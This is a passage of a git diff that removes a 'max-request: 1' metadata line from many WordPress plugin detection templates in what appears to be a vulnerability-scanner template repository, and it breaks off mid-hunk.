tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 25ca7328ef..a8b56b5df0 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: - max-request: 1 plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index cb1db5bee6..4e20e57107 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: - max-request: 1 plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index a3207ea16a..6f6a416595 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a4b772078..2dd0ef57b5 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/fast-indexing-api/ metadata: - max-request: 1 plugin_namespace: fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 366205085d..11942f4fa4 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: - max-request: 1 plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 598f08ce88..87c2aeb4bd 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/flamingo/ metadata: - max-request: 1 plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 42cdfb4475..3696eefbf7 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/fluentform/ metadata: - max-request: 1 plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index a1af263dbd..8bab0a9c3e 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/font-awesome/ metadata: - max-request: 1 plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 19265f910e..affd270123 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: - max-request: 1 plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c21d414695..1e6a62e23b 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/formidable/ metadata: - max-request: 1 plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 91c89d0ad8..980265f531 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/forminator/ metadata: - max-request: 1 plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index 539d9f7cec..daf205789d 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ga-google-analytics/ metadata: - max-request: 1 plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index f4123bb594..22bfa3ffe2 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gdpr-cookie-compliance/ metadata: - max-request: 1 plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 23a88ea130..88d38e21ed 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: - max-request: 1 plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 8074ac337e..ad238445fc 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: - max-request: 1 plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 575c9ebe67..840c086fb9 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: - max-request: 1 plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 7b0f188ff7..2678f603c6 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-site-kit/ metadata: - max-request: 1 plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 898e4de56d..20d947a5d1 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: - max-request: 1 plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 4a76856a69..22ee97b51f 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gtranslate/ metadata: - max-request: 1 plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index b321ca63eb..3f4c6c8936 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gutenberg/ metadata: - max-request: 1 plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 2b42c9f80c..fa1bb64115 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: - max-request: 1 plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml index 2409c6b370..a8eca7b056 100644 --- a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml +++ b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-and-footer-scripts/ metadata: - max-request: 1 plugin_namespace: header-and-footer-scripts wpscan: https://wpscan.com/plugin/header-and-footer-scripts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index dbea07a6da..da63d1cbf6 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: - max-request: 1 plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 17a8f220cf..f94e7f6494 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer-elementor/ metadata: - max-request: 1 plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 956a08b32d..95d2aa5f16 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer/ metadata: - max-request: 1 plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 5a570b9077..af8193b875 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/health-check/ metadata: - max-request: 1 plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 4ecac0cd92..8d7e45818b 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/hello-dolly/ metadata: - max-request: 1 plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index e50f58cef8..ed3967db7b 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/host-webfonts-local/ metadata: - max-request: 1 plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 031bb48563..2ff5adba86 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/imagify/ metadata: - max-request: 1 plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 3cdcf3da93..9099f3c0a5 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/imsanity/ metadata: - max-request: 1 plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index c222bc9d4a..1ee0e67542 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: - max-request: 1 plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index c8acf8c625..43cb2ab09c 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/instagram-feed/ metadata: - max-request: 1 plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 66b7d6a363..7ba81036cf 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: - max-request: 1 plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index a36016562d..24fc3e3295 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/iwp-client/ metadata: - max-request: 1 plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e4017b1a0a..e701e365ba 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/jetpack/ metadata: - max-request: 1 plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 53d6d393bd..c0cc5400a8 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/kadence-blocks/ metadata: - max-request: 1 plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index c286e9a14f..22687bcffe 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/kirki/ metadata: - max-request: 1 plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 364e3cd71e..b69d3d5bfe 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/leadin/ metadata: - max-request: 1 plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 4fcccbfc33..7975a57702 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: - max-request: 1 plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 3fbc714d3b..ff4cef94d7 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts/ metadata: - max-request: 1 plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index c49b506979..a8903697b0 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/litespeed-cache/ metadata: - max-request: 1 plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index dfcaf6f71b..3f141c4476 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loco-translate/ metadata: - max-request: 1 plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 61be246fee..5355e988a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loginizer/ metadata: - max-request: 1 plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml index 1c16a72d76..6f06b49011 100644 --- a/http/technologies/wordpress/plugins/loginpress.yaml +++ b/http/technologies/wordpress/plugins/loginpress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loginpress/ metadata: - max-request: 1 plugin_namespace: loginpress wpscan: https://wpscan.com/plugin/loginpress tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 50d2e6630b..53d409fb68 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 8d71f7bde9..0e908a9580 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-wp/ metadata: - max-request: 1 plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 5e1f97086e..aeb1875c57 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailpoet/ metadata: - max-request: 1 plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index d87d456a8c..7c15702305 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/maintenance/ metadata: - max-request: 1 plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index aa9153241e..5ce87e6c71 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mainwp-child/ metadata: - max-request: 1 plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 09641796a3..c342e6b45a 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/malcare-security/ metadata: - max-request: 1 plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 28b70d09bf..e95041f555 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/megamenu/ metadata: - max-request: 1 plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index b43c10ed7a..879a0d1c12 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/members/ metadata: - max-request: 1 plugin_namespace: members wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index eb7e78bc7f..985f5d373a 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/meta-box/ metadata: - max-request: 1 plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 8881e23860..8e1cb46cf0 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ml-slider/ metadata: - max-request: 1 plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7a58c58f63..7e3e4e2d7e 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/newsletter/ metadata: - max-request: 1 plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 5f99b8cac8..17ea142c46 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: - max-request: 1 plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index b08876df04..953e4ab3d8 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/nextgen-gallery/ metadata: - max-request: 1 plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 3f68dffe06..92107fa69c 100644 --- 